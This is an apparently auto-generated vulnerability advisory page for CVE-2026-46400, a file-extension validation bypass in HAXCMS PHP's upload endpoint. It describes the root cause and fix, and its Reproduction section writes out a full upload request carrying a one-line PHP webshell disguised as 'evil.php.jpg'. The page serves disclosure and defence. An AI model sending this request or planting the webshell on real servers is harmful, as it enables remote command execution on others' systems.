CVE-2026-46400
Description
HAX CMS PHP allows uploading malicious files by bypassing extension validation, potentially leading to remote code execution.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
HAX CMS PHP allows uploading malicious files by bypassing extension validation, potentially leading to remote code execution.
Vulnerability
Starting in version 11.0.6 and prior to version 25.0.0, HAXCMS PHP's file upload functionality incorrectly validates file extensions using only a regex pattern in system/backend/php/lib/HAXCMSFile.php (Lines 24-27) without verifying the actual file content or MIME type. This vulnerability exists in the PHP backend of HAXCMS.
Exploitation
An attacker can exploit this vulnerability by crafting a malicious file (e.g., a PHP webshell) and disguising it with a legitimate-looking extension (like .jpg). The attacker needs to send a POST request to the /system/api/saveFile endpoint, potentially bypassing the is_uploaded_file() check via bulk-import mode, to upload the disguised malicious file [1].
Impact
Successful exploitation allows an attacker to upload arbitrary files, including webshells, which can then be executed on the server. This can lead to remote code execution with the privileges of the web server process.
Mitigation
Version 25.0.0 contains a fix for this issue. Users should update to version 25.0.0 or later. No workarounds are mentioned in the available references [1].
AI Insight generated on Jun 5, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Range: >=11.0.6 <25.0.0
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The file upload functionality in HAXCMS PHP only validates file extensions using a regex pattern without checking the actual file content or MIME type."
Attack vector
An attacker can upload a malicious file, such as a PHP webshell, by disguising it with a legitimate image file extension (e.g., `.jpg`). The vulnerable code in HAXCMS PHP, specifically in `system/backend/php/lib/HAXCMSFile.php`, uses a regex pattern to validate file extensions but does not verify the file's content or MIME type before saving it. This allows an attacker to bypass the intended security checks and potentially achieve remote code execution if the server is misconfigured to execute files with double extensions [ref_id=1].
Affected code
The vulnerability resides in the file upload functionality within HAXCMS PHP. Specifically, lines 24-27 of the file `system/backend/php/lib/HAXCMSFile.php` contain the vulnerable code that performs file extension validation using a regex pattern. The advisory notes that the MIME type check at lines 73-77 occurs too late, after the file has already been saved to disk [ref_id=1].
What the fix does
The advisory recommends validating the MIME type before saving the file, using functions like `finfo_open(FILEINFO_MIME_TYPE)` to check the actual file type, and verifying file content with methods such as `getimagesize()` for images. Additionally, it suggests storing uploaded files outside the web root or using `Content-Disposition: attachment` to mitigate risks [ref_id=1]. Version 25.0.0 is stated to contain a fix for this issue.
Preconditions
- inputThe attacker must be able to initiate a file upload request.
- inputThe uploaded file must have a legitimate-looking extension (e.g., .jpg) but contain malicious code (e.g., a PHP webshell).
Reproduction
POST /system/api/saveFile?site_token=39j7UnbEZzHBuywxvlQt5hQi6f9gp86ZDKBm9OCJ450?siteName=club-website&nodeId=item-club-home&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IlhSY3lIQndaWlJiRFVyeVhLcVhHaFpSYkJzOG5LSWM2SG xTQTJNelBYbFkiLCJpYXQiOjE3NjgyODIyMDYsImV4cCI6MTc2ODI4MzEwNiwidXNlciI6ImZvZWNhdCJ9.kHUlyquhx1SiaMAFDj3Av1kKtmXBY6bG-iw_TDgyEbI HTTP/1.1 Host: 192.168.176.130:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:146.0) Gecko/20100101 Firefox/146.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=----geckoformboundary62afc0223c1b108ae6a19913de6fe977 Content-Length: 254 Origin: http://192.168.176.130:8080 Connection: keep-alive Referer: http://192.168.176.130:8080/sites/club-website/ Cookie: from-crmeb-admin%3Auuid=1; from-crmeb-admin%3Atoken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiJmZTQxMGRlMTU2Yzg4ODU2Yjk1MTA5Y2YwYmJiODA5MCIsImlzcyI6IjE5Mi4xNjguMTc2LjEzMDo4MDExIiwiYXVkIjoiMTkyLjE2OC4xNzYuMTMwO: 8011iLCJpYXQiOjE3Njc2NDMyMjksIm5iZiI6MTc2NzY0MzIyOSwiZXhwIjoxNzcwMjM1MjI5LCJqdGkiOnsiaWQiOjEsInR5cGUiOiJhZG1pbiJ9fQ.ksBnrXPPDQ4jozhgV4DiBn-9kXRTVossplQh6kdsWog; from-crmeb-admin%3Aexpires_time=1770235229; haxcms_refresh_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZm9lY2F0IiwiaWF0IjoxNzY4MjgyMjA2LCJleHAiOjE3NjgzNjg2MDZ9.GavlZgSX_ROrDR0IncAGbNUCqcMw8Z5M3yBTYIP5Hd4 Priority: u=0
------geckoformboundary62afc0223c1b108ae6a19913de6fe977 Content-Disposition: form-data; name="file-upload"; filename="evil.php.jpg" Content-Type: image/jpeg
<?php system($_GET["cmd"]); ?>
------geckoformboundary62afc0223c1b108ae6a19913de6fe977--
File is saved to: /var/www/html/_sites/club-website/files/evil.php.jpg May be executed depending on server configuration [ref_id=1]
Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1News mentions
1- HAX CMS: 15 Vulnerabilities Disclosed Together on June 5, 2026Vypr Intelligence · Jun 5, 2026